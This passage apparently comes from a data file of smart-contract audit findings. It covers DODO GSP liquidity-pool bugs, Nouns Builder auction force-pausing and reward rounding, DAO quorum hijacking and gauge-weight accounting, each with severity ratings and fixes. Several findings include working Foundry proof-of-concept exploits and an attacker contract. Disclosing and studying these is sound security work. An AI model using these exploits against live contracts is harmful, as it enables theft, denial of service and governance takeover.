= gsp.sellBase(tapir);\\n vm.stopPrank();\\n\\n // this is the tx will be sandwiched by the MEV trader\\n vm.prank(MAINTAINER);\\n gsp.adjustPrice(999000);\\n\\n // quickly resell whatever gained by the price update\\n vm.startPrank(tapir);\\n usdc.safeTransfer(address(gsp), receivedQuoteTokens);\\n uint256 receivedBaseTokens = gsp.sellQuote(tapir);\\n console.log(\"Base target\", gsp._BASE_TARGET_());\\n console.log(\"Quote target\", gsp._QUOTE_TARGET_());\\n console.log(\"Base reserve\", gsp._BASE_RESERVE_());\\n console.log(\"Quote reserve\", gsp._QUOTE_RESERVE_());\\n console.log(\"Received base tokens\", receivedBaseTokens);\\n\\n // NOTE: the LP fee and MT FEE is set for this example, so this is not an rough assumption\\n // where fees are 0. Here the fees set for both of the values (default values):\\n // uint256 constant LP_FEE_RATE = 10000000000000;\\n // uint256 constant MT_FEE_RATE = 10000000000000;\\n\\n // whatever we get is more than we started, in this example\\n // MEV trader started 5 DAI and we have more than 5 DAI!!\\n assertGe(receivedBaseTokens, initialBaseTokensSwapped);\\n }\\n```\\n -First depositor can lock the quote target value to zeroчmediumчWhen the initial deposit occurs, it is possible for the quote target to be set to 0. This situation significantly impacts other LPs as well. Even if subsequent LPs deposit substantial amounts, the quote target remains at 0 due to multiplication with this zero value. 0 QUOTE_TARGET value will impact the swaps that pool facilities\\nWhen the first deposit happens, QUOTE_TARGET is set as follows:\\n```\\n if (totalSupply == 0) {\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_)\\n ? 
DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance;\\n // The target will be updated\\n _BASE_TARGET_ = uint112(shares);\\n _QUOTE_TARGET_ = uint112(DecimalMath.mulFloor(shares, _I_));\\n```\\n\\nIn this scenario, the 'shares' value can be a minimum of 1e3, as indicated here: link to code snippet.\\nThis implies that if someone deposits minuscule amounts of quote token and base token, they can set the QUOTE_TARGET to zero because the `mulFloor` operation uses a scaling factor of 1e18:\\n```\\nfunction mulFloor(uint256 target, uint256 d) internal pure returns (uint256) {\\n return target * d / (10 ** 18);\\n }\\n```\\n\\n```\\n// @review 0 + (0 * something) = 0! doesn't matter what amount has been deposited !\\n_QUOTE_TARGET_ = uint112(uint256(_QUOTE_TARGET_) + (DecimalMath.mulFloor(uint256(_QUOTE_TARGET_), mintRatio)));\\n```\\n\\nHere a PoC shows that if the first deposit is tiny the QUOTE_TARGET is 0. Also, whatever deposits after goes through the QUOTE_TARGET still 0 because of the multiplication with 0!\\n```\\nfunction test_StartWithZeroTarget() external {\\n // tapir deposits tiny amounts to make quote target 0\\n vm.startPrank(tapir);\\n dai.safeTransfer(address(gsp), 1 * 1e5);\\n usdc.transfer(address(gsp), 1 * 1e5);\\n gsp.buyShares(tapir);\\n\\n console.log(\"Base target\", gsp._BASE_TARGET_());\\n console.log(\"Quote target\", gsp._QUOTE_TARGET_());\\n console.log(\"Base reserve\", gsp._BASE_RESERVE_());\\n console.log(\"Quote reserve\", gsp._QUOTE_RESERVE_());\\n\\n // quote target is indeed 0!\\n assertEq(gsp._QUOTE_TARGET_(), 0);\\n\\n vm.stopPrank();\\n\\n // hippo deposits properly\\n vm.startPrank(hippo);\\n dai.safeTransfer(address(gsp), 1000 * 1e18);\\n usdc.transfer(address(gsp), 10000 * 1e6);\\n gsp.buyShares(hippo);\\n\\n console.log(\"Base target\", gsp._BASE_TARGET_());\\n console.log(\"Quote target\", gsp._QUOTE_TARGET_());\\n console.log(\"Base reserve\", gsp._BASE_RESERVE_());\\n console.log(\"Quote reserve\", 
gsp._QUOTE_RESERVE_());\\n\\n // although hippo deposited 1000 USDC as quote tokens, target is still 0 due to multiplication with 0\\n assertEq(gsp._QUOTE_TARGET_(), 0);\\n }\\n```\\n\\nTest result and logs:чAccording to the quote tokens decimals, multiply the quote token balance with the proper decimal scalor.чSince the quote target is important and used when pool deciding the swap math I will label this as high.ч```\\n if (totalSupply == 0) {\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_)\\n ? DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance;\\n // The target will be updated\\n _BASE_TARGET_ = uint112(shares);\\n _QUOTE_TARGET_ = uint112(DecimalMath.mulFloor(shares, _I_));\\n```\\n -Share Price Inflation by First LP-er, Enabling DOS Attacks on Subsequent buyShares with Up to 1001x the Attacking CostчmediumчThe smart contract contains a critical vulnerability that allows a malicious actor to manipulate the share price during the initialization of the liquidity pool, potentially leading to a DOS attack on subsequent buyShares operations.\\nThe root cause of the vulnerability lies in the initialization process of the liquidity pool, specifically in the calculation of shares during the first deposit.\\n```\\n// Findings are labeled with '<= FOUND'\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPFunding.sol\\n function buyShares(address to)\\n // rest of code\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_) // <= FOUND\\n ? 
DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance; // @audit-info mint shares based on min balance(base, quote)\\n // The target will be updated\\n _BASE_TARGET_ = uint112(shares);\\n // rest of code\\n }\\n```\\n\\nIf the pool is empty, the smart contract directly sets the share value based on the minimum value of the base token denominated value of the provided assets. This assumption can be manipulated by a malicious actor during the first deposit, leading to a situation where the LP pool token becomes extremely expensive.\\nAttack Scenario\\nThe attacker exploits the vulnerability during the initialization of the liquidity pool:\\nThe attacker mints 1001 `shares` during the first deposit.\\nImmediately, the attacker sells back 1000 `shares`, ensuring to keep 1 wei via the `sellShares` function.\\nThe attacker then donates a large amount (1000e18) of base and quote tokens and invokes the `sync()` routine to pump the base and quote reserves to 1001 + 1000e18.\\nThe protocol users proceed to execute the `buyShares` function with a balance less than `attacker's spending * 1001`. The transaction reverts due to the `mintRatio` being kept below 1001 wad and the computed `shares` less than 1001 (line 71), while it needs a value >= 1001 to mint `shares` successfully.\\n```\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPFunding.sol\\n function buyShares(address to)\\n // rest of code\\n // case 2. normal case\\n uint256 baseInputRatio = DecimalMath.divFloor(baseInput, baseReserve);\\n uint256 quoteInputRatio = DecimalMath.divFloor(quoteInput, quoteReserve);\\n uint256 mintRatio = quoteInputRatio < baseInputRatio ? 
quoteInputRatio : baseInputRatio; // <= FOUND: mintRatio below 1001wad if input amount smaller than reserves * 1001\\n // The shares will be minted to user\\n shares = DecimalMath.mulFloor(totalSupply, mintRatio); // <= FOUND: the manipulated totalSupply of 1wei requires a mintRatio of greater than 1000 for a successful _mint()\\n // rest of code\\n }\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPVault.sol\\n function _mint(address user, uint256 value) internal {\\n require(value > 1000, \"MINT_AMOUNT_NOT_ENOUGH\"); // <= FOUND: next buyShares with volume less than 1001 x attacker balance will revert here\\n// rest of code\\n }\\n```\\n\\nThe `_mint()` function fails with a \"MINT_AMOUNT_NOT_ENOUGH\" error, causing a denial-of-service condition for subsequent buyShares operations.\\nPOC\\n```\\n// File: dodo-gassaving-pool/test/GPSTrader.t.sol\\n function test_mint1weiShares_DOSx1000DonationVolume() public {\\n GSP gspTest = new GSP();\\n gspTest.init(\\n MAINTAINER,\\n address(mockBaseToken),\\n address(mockQuoteToken),\\n 0,\\n 0,\\n 1000000,\\n 500000000000000,\\n false\\n );\\n\\n // Buy 1001 shares\\n vm.startPrank(USER);\\n mockBaseToken.transfer(address(gspTest), 1001);\\n mockQuoteToken.transfer(address(gspTest), 1001 * gspTest._I_() / 1e18);\\n gspTest.buyShares(USER);\\n assertEq(gspTest.balanceOf(USER), 1001);\\n\\n // User sells shares and keep ONLY 1wei\\n gspTest.sellShares(1000, USER, 0, 0, \"\", block.timestamp);\\n assertEq(gspTest.balanceOf(USER), 1);\\n\\n // User donate a huge amount of base & quote tokens to inflate the share price\\n uint256 donationAmount = 1000e18;\\n mockBaseToken.transfer(address(gspTest), donationAmount);\\n mockQuoteToken.transfer(address(gspTest), donationAmount * gspTest._I_() / 1e18);\\n gspTest.sync();\\n vm.stopPrank();\\n\\n // DOS subsequent operations with roughly 1001 x donation volume\\n uint256 dosAmount = donationAmount * 1001;\\n mockBaseToken.mint(OTHER, type(uint256).max);\\n 
mockQuoteToken.mint(OTHER, type(uint256).max);\\n\\n vm.startPrank(OTHER);\\n mockBaseToken.transfer(address(gspTest), dosAmount);\\n mockQuoteToken.transfer(address(gspTest), dosAmount * gspTest._I_() / 1e18);\\n\\n vm.expectRevert(\"MINT_AMOUNT_NOT_ENOUGH\");\\n gspTest.buyShares(OTHER);\\n vm.stopPrank();\\n }\\n```\\n\\nA PASS result would confirm that any deposits with volume less than 1001 times to attacker cost would fail. That means by spending $1000, the attacker can DOS any transaction with volume below $1001,000.чA mechanism should be implemented to handle the case of zero totalSupply during initialization. A potential solution is inspired by Uniswap V2 Core Code, which sends the first 1001 LP tokens to the zero address. This way, it's extremely costly to inflate the share price as much as 1001 times on the first deposit.\\n```\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPFunding.sol\\n function buyShares(address to)\\n // rest of code\\n if (totalSupply == 0) {\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_)\\n ? DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance; \\n+ _mint(address(0), 1001); // permanently lock the first MINIMUM_LIQUIDITY of 1001 tokens, makes it imposible to manipulate the totalSupply to 1 wei\\n// rest of code\\n``` // rest of code\\n```\\nчThe impact of this vulnerability is severe, as it allows an attacker to conduct DOS attacks on buyShares with a low attacking cost (retrievable for further attacks via sellShares). 
This significantly impairs the core functionality of the protocol, potentially preventing further LP operations and hindering the protocol's ability to attract Total Value Locked (TVL) for other trading operations such as sellBase, sellQuote and flashloan.ч```\\n// Findings are labeled with '<= FOUND'\\n// File: dodo-gassaving-pool/contracts/GasSavingPool/impl/GSPFunding.sol\\n function buyShares(address to)\\n // rest of code\\n // case 1. initial supply\\n // The shares will be minted to user\\n shares = quoteBalance < DecimalMath.mulFloor(baseBalance, _I_) // <= FOUND\\n ? DecimalMath.divFloor(quoteBalance, _I_)\\n : baseBalance; // @audit-info mint shares based on min balance(base, quote)\\n // The target will be updated\\n _BASE_TARGET_ = uint112(shares);\\n // rest of code\\n }\\n```\\n -Attacker can force pause the Auction contract.чmediumчIn certain situations (e.g founders have ownership percentage greater than 51) an attacker can potentially exploit the `try catch` within the `Auction._CreateAuction()` function to arbitrarily pause the auction contract.\\nConsider the code from `Auction._CreateAuction()` function, which is called by `Auction.settleCurrentAndCreateNewAuction()`. 
It first tries to mint a new token for the auction, and if the minting fails the `catch` branch will be triggered, pausing the auction.\\n```\\nfunction _createAuction() private returns (bool) {\\n // Get the next token available for bidding\\n try token.mint() returns (uint256 tokenId) {\\n // Store the token id\\n auction.tokenId = tokenId;\\n\\n // Cache the current timestamp\\n uint256 startTime = block.timestamp;\\n\\n // Used to store the auction end time\\n uint256 endTime;\\n\\n // Cannot realistically overflow\\n unchecked {\\n // Compute the auction end time\\n endTime = startTime + settings.duration;\\n }\\n\\n // Store the auction start and end time\\n auction.startTime = uint40(startTime);\\n auction.endTime = uint40(endTime);\\n\\n // Reset data from the previous auction\\n auction.highestBid = 0;\\n auction.highestBidder = address(0);\\n auction.settled = false;\\n\\n // Reset referral from the previous auction\\n currentBidReferral = address(0);\\n\\n emit AuctionCreated(tokenId, startTime, endTime);\\n return true;\\n } catch {\\n // Pause the contract if token minting failed\\n _pause();\\n return false;\\n }\\n}\\n```\\n\\nDue to the internal logic of the `mint` function, if there are founders with high ownership percentages, many tokens can be minted to them during calls to mintas part of the vesting mechanism. As a consequence of this under some circumstances calls to `mint` can consume huge amounts of gas.\\nCurrently on Ethereum and EVM-compatible chains, calls can consume at most 63/64 of the parent's call gas (See EIP-150). An attacker can exploit this circumstances of high gas cost to restrict the parent gas call limit, making `token.mint()` fail and still leaving enough gas left (1/64) for the `_pause()` call to succeed. 
Therefore he is able to force the pausing of the auction contract at will.\\nBased on the gas requirements (1/64 of the gas calls has to be enough for `_pause()` gas cost of 21572), then `token.mint()` will need to consume at least 1359036 gas (63 * 21572), consequently it is only possible on some situations like founders with high percentage of vesting, for example 51 or more.\\nConsider the following POC. Here we are using another contract to restrict the gas limit of the call, but this can also be done with an EOA call from the attacker.\\nExploit contract code:\\n```\\npragma solidity ^0.8.16;\\n\\ncontract Attacker {\\n function forcePause(address target) external {\\n bytes4 selector = bytes4(keccak256(\"settleCurrentAndCreateNewAuction()\"));\\n assembly {\\n let ptr := mload(0x40)\\n mstore(ptr,selector)\\n let success := call(1500000, target, 0, ptr, 4, 0, 0)\\n }\\n }\\n}\\n```\\n\\nPOC:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.16;\\n\\nimport { NounsBuilderTest } from \"./utils/NounsBuilderTest.sol\";\\nimport { MockERC721 } from \"./utils/mocks/MockERC721.sol\";\\nimport { MockImpl } from \"./utils/mocks/MockImpl.sol\";\\nimport { MockPartialTokenImpl } from \"./utils/mocks/MockPartialTokenImpl.sol\";\\nimport { MockProtocolRewards } from \"./utils/mocks/MockProtocolRewards.sol\";\\nimport { Auction } from \"../src/auction/Auction.sol\";\\nimport { IAuction } from \"../src/auction/IAuction.sol\";\\nimport { AuctionTypesV2 } from \"../src/auction/types/AuctionTypesV2.sol\";\\nimport { TokenTypesV2 } from \"../src/token/types/TokenTypesV2.sol\";\\nimport { Attacker } from \"./Attacker.sol\";\\n\\ncontract AuctionTest is NounsBuilderTest {\\n MockImpl internal mockImpl;\\n Auction internal rewardImpl;\\n Attacker internal attacker;\\n address internal bidder1;\\n address internal bidder2;\\n address internal referral;\\n uint16 internal builderRewardBPS = 300;\\n uint16 internal referralRewardBPS = 400;\\n\\n function setUp() public 
virtual override {\\n super.setUp();\\n bidder1 = vm.addr(0xB1);\\n bidder2 = vm.addr(0xB2);\\n vm.deal(bidder1, 100 ether);\\n vm.deal(bidder2, 100 ether);\\n mockImpl = new MockImpl();\\n rewardImpl = new Auction(address(manager), address(rewards), weth, builderRewardBPS, referralRewardBPS);\\n attacker = new Attacker();\\n }\\n\\n function test_POC() public {\\n // START OF SETUP\\n address[] memory wallets = new address[](1);\\n uint256[] memory percents = new uint256[](1);\\n uint256[] memory vestingEnds = new uint256[](1);\\n wallets[0] = founder;\\n percents[0] = 99;\\n vestingEnds[0] = 4 weeks;\\n //Setting founder with high percentage ownership.\\n setFounderParams(wallets, percents, vestingEnds);\\n setMockTokenParams();\\n setMockAuctionParams();\\n setMockGovParams();\\n deploy(foundersArr, tokenParams, auctionParams, govParams);\\n setMockMetadata();\\n // END OF SETUP\\n\\n // Start auction contract and do the first auction\\n vm.prank(founder);\\n auction.unpause();\\n vm.prank(bidder1);\\n auction.createBid{ value: 0.420 ether }(99);\\n vm.prank(bidder2);\\n auction.createBid{ value: 1 ether }(99);\\n\\n // Move block.timestamp so auction can end.\\n vm.warp(10 minutes + 1 seconds);\\n\\n //Attacker calls the auction\\n attacker.forcePause(address(auction));\\n\\n //Check that auction was paused.\\n assertEq(auction.paused(), true);\\n }\\n}\\n```\\nчConsider better handling the possible errors from `Token.mint()`, like shown below:\\n```\\n function _createAuction() private returns (bool) {\\n // Get the next token available for bidding\\n try token.mint() returns (uint256 tokenId) {\\n //CODE OMMITED\\n } catch (bytes memory err) {\\n // On production consider pre-calculating the hash values to save gas\\n if (keccak256(abi.encodeWithSignature(\"NO_METADATA_GENERATED()\")) == keccak256(err)) {\\n _pause();\\n return false\\n } else if (keccak256(abi.encodeWithSignature(\"ALREADY_MINTED()\") == keccak256(err)) {\\n _pause();\\n return false\\n } 
else {\\n revert OUT_OF_GAS();\\n }\\n } \\n```\\nчShould the conditions mentioned above be met, an attacker can arbitrarily pause the auction contract, effectively interrupting the DAO auction process. This pause persists until owners takes subsequent actions to unpause the contract. The attacker can exploit this vulnerability repeatedly.ч```\\nfunction _createAuction() private returns (bool) {\\n // Get the next token available for bidding\\n try token.mint() returns (uint256 tokenId) {\\n // Store the token id\\n auction.tokenId = tokenId;\\n\\n // Cache the current timestamp\\n uint256 startTime = block.timestamp;\\n\\n // Used to store the auction end time\\n uint256 endTime;\\n\\n // Cannot realistically overflow\\n unchecked {\\n // Compute the auction end time\\n endTime = startTime + settings.duration;\\n }\\n\\n // Store the auction start and end time\\n auction.startTime = uint40(startTime);\\n auction.endTime = uint40(endTime);\\n\\n // Reset data from the previous auction\\n auction.highestBid = 0;\\n auction.highestBidder = address(0);\\n auction.settled = false;\\n\\n // Reset referral from the previous auction\\n currentBidReferral = address(0);\\n\\n emit AuctionCreated(tokenId, startTime, endTime);\\n return true;\\n } catch {\\n // Pause the contract if token minting failed\\n _pause();\\n return false;\\n }\\n}\\n```\\n -MerkleReserveMinter minting methodology is incompatible with current governance structure and can lead to migrated DAOs being hijacked immediatelyчmediumчMerkleReserveMinter allows large number of tokens to be minted instantaneously which is incompatible with the current governance structure which relies on tokens being minted individually and time locked after minting by the auction. By minting and creating a proposal in the same block a user is able to create a proposal with significantly lower quorum than expected. 
This could easily be used to hijack the migrated DAO.\\nMerkleReserveMinter.sol#L154-L167\\n```\\nunchecked {\\n for (uint256 i = 0; i < claimCount; ++i) {\\n // Load claim in memory\\n MerkleClaim memory claim = claims[I];\\n\\n // Requires one proof per tokenId to handle cases where users want to partially claim\\n if (!MerkleProof.verify(claim.merkleProof, settings.merkleRoot, keccak256(abi.encode(claim.mintTo, claim.tokenId)))) {\\n revert INVALID_MERKLE_PROOF(claim.mintTo, claim.merkleProof, settings.merkleRoot);\\n }\\n\\n // Only allowing reserved tokens to be minted for this strategy\\n IToken(tokenContract).mintFromReserveTo(claim.mintTo, claim.tokenId);\\n }\\n}\\n```\\n\\nWhen minting from the claim merkle tree, a user is able to mint as many tokens as they want in a single transaction. This means in a single transaction, the supply of the token can increase very dramatically. Now we'll take a look at the governor contract as to why this is such an issue.\\nGovernor.sol#L184-L192\\n```\\n // Store the proposal data\\n proposal.voteStart = SafeCast.toUint32(snapshot);\\n proposal.voteEnd = SafeCast.toUint32(deadline);\\n proposal.proposalThreshold = SafeCast.toUint32(currentProposalThreshold);\\n proposal.quorumVotes = SafeCast.toUint32(quorum());\\n proposal.proposer = msg.sender;\\n proposal.timeCreated = SafeCast.toUint32(block.timestamp);\\n\\n emit ProposalCreated(proposalId, _targets, _values, _calldatas, _description, descriptionHash, proposal);\\n```\\n\\nGovernor.sol#L495-L499\\n```\\nfunction quorum() public view returns (uint256) {\\n unchecked {\\n return (settings.token.totalSupply() * settings.quorumThresholdBps) / BPS_PER_100_PERCENT;\\n }\\n}\\n```\\n\\nWhen creating a proposal, we see that it uses a snapshot of the CURRENT total supply. This is what leads to the issue. 
The setup is fairly straightforward and occurs all in a single transaction:\\nCreate a malicious proposal (which snapshots current supply)\\nMint all the tokens\\nVote on malicious proposal with all minted tokens\\nThe reason this works is because the quorum is based on the supply before the mint while votes are considered after the mint, allowing significant manipulation of the quorum.чToken should be changed to use a checkpoint based total supply, similar to how balances are handled. Quorum should be based on that instead of the current supply.чDAO can be completely hijackedч```\\nunchecked {\\n for (uint256 i = 0; i < claimCount; ++i) {\\n // Load claim in memory\\n MerkleClaim memory claim = claims[i];\\n\\n // Requires one proof per tokenId to handle cases where users want to partially claim\\n if (!MerkleProof.verify(claim.merkleProof, settings.merkleRoot, keccak256(abi.encode(claim.mintTo, claim.tokenId)))) {\\n revert INVALID_MERKLE_PROOF(claim.mintTo, claim.merkleProof, settings.merkleRoot);\\n }\\n\\n // Only allowing reserved tokens to be minted for this strategy\\n IToken(tokenContract).mintFromReserveTo(claim.mintTo, claim.tokenId);\\n }\\n}\\n```\\n -when reservedUntilTokenId > 100 first founder loses 1% NFTчhighчThe incorrect use of `baseTokenId = reservedUntilTokenId` may result in the first `tokenRecipient[]` being invalid, thus preventing the founder from obtaining this portion of the NFT.\\nThe current protocol adds a parameter `reservedUntilTokenId` for reserving `Token`. 
This parameter will be used as the starting `baseTokenId` during initialization.\\n```\\n function _addFounders(IManager.FounderParams[] calldata _founders, uint256 reservedUntilTokenId) internal {\\n// rest of code\\n\\n // Used to store the base token id the founder will recieve\\n uint256 baseTokenId = reservedUntilTokenId;\\n\\n // For each token to vest:\\n for (uint256 j; j < founderPct; ++j) {\\n // Get the available token id\\n baseTokenId = _getNextTokenId(baseTokenId);\\n\\n // Store the founder as the recipient\\n tokenRecipient[baseTokenId] = newFounder;\\n\\n emit MintScheduled(baseTokenId, founderId, newFounder);\\n\\n // Update the base token id\\n baseTokenId = (baseTokenId + schedule) % 100;\\n }\\n }\\n..\\n\\n function _getNextTokenId(uint256 _tokenId) internal view returns (uint256) {\\n unchecked {\\n while (tokenRecipient[_tokenId].wallet != address(0)) {\\n _tokenId = (++_tokenId) % 100;\\n }\\n\\n return _tokenId;\\n }\\n }\\n```\\n\\nBecause `baseTokenId = reservedUntilTokenId` is used, if `reservedUntilTokenId>100`, for example, reservedUntilTokenId=200, the first `_getNextTokenId(200)` will return `baseTokenId=200 , tokenRecipient[200]=newFounder`.\\nExample: reservedUntilTokenId = 200 founder[0].founderPct = 10\\nIn this way, the `tokenRecipient[]` of `founder` will become tokenRecipient[200].wallet = `founder` ( first will call _getNextTokenId(200) return 200) tokenRecipient[10].wallet = `founder` ( second will call _getNextTokenId((200 + 10) %100 = 10) ) tokenRecipient[20].wallet = `founder` ... tokenRecipient[90].wallet = `founder`\\nHowever, this `tokenRecipient[200]` will never be used, because in `_isForFounder()`, it will be modulo, so only `baseTokenId < 100` is valid. 
In this way, the first founder can actually only `9%` of NFT.\\n```\\n function _isForFounder(uint256 _tokenId) private returns (bool) {\\n // Get the base token id\\n uint256 baseTokenId = _tokenId % 100;\\n\\n // If there is no scheduled recipient:\\n if (tokenRecipient[baseTokenId].wallet == address(0)) {\\n return false;\\n\\n // Else if the founder is still vesting:\\n } else if (block.timestamp < tokenRecipient[baseTokenId].vestExpiry) {\\n // Mint the token to the founder\\n _mint(tokenRecipient[baseTokenId].wallet, _tokenId);\\n\\n return true;\\n\\n // Else the founder has finished vesting:\\n } else {\\n // Remove them from future lookups\\n delete tokenRecipient[baseTokenId];\\n\\n return false;\\n }\\n }\\n```\\n\\nPOC\\nThe following test demonstrates that `tokenRecipient[200]` is for founder.\\nneed change tokenRecipient to public , so can assertEq\\n```\\ncontract TokenStorageV1 is TokenTypesV1 {\\n /// @notice The token settings\\n Settings internal settings;\\n\\n /// @notice The vesting details of a founder\\n /// @dev Founder id => Founder\\n mapping(uint256 => Founder) internal founder;\\n\\n /// @notice The recipient of a token\\n /// @dev ERC// Remove the line below\\n721 token id => Founder\\n// Remove the line below\\n mapping(uint256 => Founder) internal tokenRecipient;\\n// Add the line below\\n mapping(uint256 => Founder) public tokenRecipient;\\n}\\n```\\n\\nadd to `token.t.sol`\\n```\\n function test_lossFirst(address _minter, uint256 _reservedUntilTokenId, uint256 _tokenId) public {\\n deployAltMock(200);\\n (address wallet ,,)= token.tokenRecipient(200);\\n assertEq(wallet,founder);\\n }\\n```\\n\\n```\\n$ forge test -vvv --match-test test_lossFirst\\n\\nRunning 1 test for test/Token.t.sol:TokenTest\\n[PASS] test_lossFirst(address,uint256,uint256) (runs: 256, μ: 3221578, ~: 3221578)\\nTest result: ok. 
1 passed; 0 failed; 0 skipped; finished in 355.45ms\\nRan 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)\\n```\\nчA better approach is that the baseTokenId always starts from 0.\\n```\\n function _addFounders(IManager.FounderParams[] calldata _founders, uint256 reservedUntilTokenId) internal {\\n// rest of code\\n\\n // Used to store the base token id the founder will recieve\\n// Remove the line below\\n uint256 baseTokenId = reservedUntilTokenId;\\n// Add the line below\\n uint256 baseTokenId =0;\\n```\\n\\nor\\nuse `uint256 baseTokenId = reservedUntilTokenId % 100;`\\n```\\n function _addFounders(IManager.FounderParams[] calldata _founders, uint256 reservedUntilTokenId) internal {\\n// rest of code\\n\\n // Used to store the base token id the founder will recieve\\n// Remove the line below\\n uint256 baseTokenId = reservedUntilTokenId;\\n// Add the line below\\n uint256 baseTokenId = reservedUntilTokenId % 100;\\n```\\nчwhen reservedUntilTokenId > 100 first founder loses 1% NFTч```\\n function _addFounders(IManager.FounderParams[] calldata _founders, uint256 reservedUntilTokenId) internal {\\n// rest of code\\n\\n // Used to store the base token id the founder will recieve\\n uint256 baseTokenId = reservedUntilTokenId;\\n\\n // For each token to vest:\\n for (uint256 j; j < founderPct; ++j) {\\n // Get the available token id\\n baseTokenId = _getNextTokenId(baseTokenId);\\n\\n // Store the founder as the recipient\\n tokenRecipient[baseTokenId] = newFounder;\\n\\n emit MintScheduled(baseTokenId, founderId, newFounder);\\n\\n // Update the base token id\\n baseTokenId = (baseTokenId + schedule) % 100;\\n }\\n }\\n..\\n\\n function _getNextTokenId(uint256 _tokenId) internal view returns (uint256) {\\n unchecked {\\n while (tokenRecipient[_tokenId].wallet != address(0)) {\\n _tokenId = (++_tokenId) % 100;\\n }\\n\\n return _tokenId;\\n }\\n }\\n```\\n -Adversary can permanently brick auctions due to precision error in Auction#_computeTotalRewardsчhighчWhen 
batch depositing to ProtocolRewards, the msg.value is expected to match the sum of the amounts array EXACTLY. The issue is that due to precision loss in Auction#_computeTotalRewards this call can be engineered to always revert which completely bricks the auction process.\\nProtocolRewards.sol#L55-L65\\n```\\n for (uint256 i; i < numRecipients; ) {\\n expectedTotalValue += amounts[i];\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n if (msg.value != expectedTotalValue) {\\n revert INVALID_DEPOSIT();\\n }\\n```\\n\\nWhen making a batch deposit the above method is called. As seen, the call with revert if the sum of amounts does not EXACTLY equal the msg.value.\\nAuction.sol#L474-L507\\n```\\n uint256 totalBPS = _founderRewardBps + referralRewardsBPS + builderRewardsBPS;\\n\\n // rest of code\\n\\n // Calulate total rewards\\n split.totalRewards = (_finalBidAmount * totalBPS) / BPS_PER_100_PERCENT;\\n\\n // rest of code\\n\\n // Initialize arrays\\n split.recipients = new address[](arraySize);\\n split.amounts = new uint256[](arraySize);\\n split.reasons = new bytes4[](arraySize);\\n\\n // Set builder reward\\n split.recipients[0] = builderRecipient;\\n split.amounts[0] = (_finalBidAmount * builderRewardsBPS) / BPS_PER_100_PERCENT;\\n\\n // Set referral reward\\n split.recipients[1] = _currentBidRefferal != address(0) ? _currentBidRefferal : builderRecipient;\\n split.amounts[1] = (_finalBidAmount * referralRewardsBPS) / BPS_PER_100_PERCENT;\\n\\n // Set founder reward if enabled\\n if (hasFounderReward) {\\n split.recipients[2] = founderReward.recipient;\\n split.amounts[2] = (_finalBidAmount * _founderRewardBps) / BPS_PER_100_PERCENT;\\n }\\n```\\n\\nThe sum of the percentages are used to determine the totalRewards. Meanwhile, the amounts are determined using the broken out percentages of each. This leads to unequal precision loss, which can cause totalRewards to be off by a single wei which cause the batch deposit to revert and the auction to be bricked. 
Take the following example:\\nAssume a referral reward of 5% (500) and a builder reward of 5% (500) for a total of 10% (1000). To brick the contract the adversary can engineer their bid with specific final digits. In this example, take a bid ending in 19.\\n```\\nsplit.totalRewards = (19 * 1,000) / 100,000 = 190,000 / 100,000 = 1\\n\\nsplit.amounts[0] = (19 * 500) / 100,000 = 95,000 / 100,000 = 0\\nsplit.amounts[1] = (19 * 500) / 100,000 = 95,000 / 100,000 = 0\\n```\\n\\nHere we can see that the sum of amounts is not equal to totalRewards and the batch deposit will revert.\\nAuction.sol#L270-L273\\n```\\nif (split.totalRewards != 0) {\\n // Deposit rewards\\n rewardsManager.depositBatch{ value: split.totalRewards }(split.recipients, split.amounts, split.reasons, \"\");\\n}\\n```\\n\\nThe depositBatch call is placed in the very important _settleAuction function. This results in auctions that are permanently broken and can never be settled.чInstead of setting totalRewards with the sum of the percentages, increment it by each fee calculated. 
This way they will always match no matter what.чAuctions are completely brickedч```\\n for (uint256 i; i < numRecipients; ) {\\n expectedTotalValue += amounts[i];\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n if (msg.value != expectedTotalValue) {\\n revert INVALID_DEPOSIT();\\n }\\n```\\n -Lowering the gauge weight can disrupt accounting, potentially leading to both excessive fund distribution and a loss of funds.чhighчSimilar issues were found by users 0xDetermination and bart1e in the Canto veRWA audit, which uses a similar gauge controller type.\\nWhen the _change_gauge_weight function is called, the `points_weight[addr][next_time].bias` andtime_weight[addr] are updated - the slope is not.\\n```\\ndef _change_gauge_weight(addr: address, weight: uint256):\\n # Change gauge weight\\n # Only needed when testing in reality\\n gauge_type: int128 = self.gauge_types_[addr] - 1\\n old_gauge_weight: uint256 = self._get_weight(addr)\\n type_weight: uint256 = self._get_type_weight(gauge_type)\\n old_sum: uint256 = self._get_sum(gauge_type)\\n _total_weight: uint256 = self._get_total()\\n next_time: uint256 = (block.timestamp + WEEK) / WEEK * WEEK\\n\\n self.points_weight[addr][next_time].bias = weight\\n self.time_weight[addr] = next_time\\n\\n new_sum: uint256 = old_sum + weight - old_gauge_weight\\n self.points_sum[gauge_type][next_time].bias = new_sum\\n self.time_sum[gauge_type] = next_time\\n\\n _total_weight = _total_weight + new_sum * type_weight - old_sum * type_weight\\n self.points_total[next_time] = _total_weight\\n self.time_total = next_time\\n\\n log NewGaugeWeight(addr, block.timestamp, weight, _total_weight)\\n```\\n\\nThe equation f(t) = c - mx represents the gauge's decay equation before the weight is reduced. In this equation, `m` is the slope. 
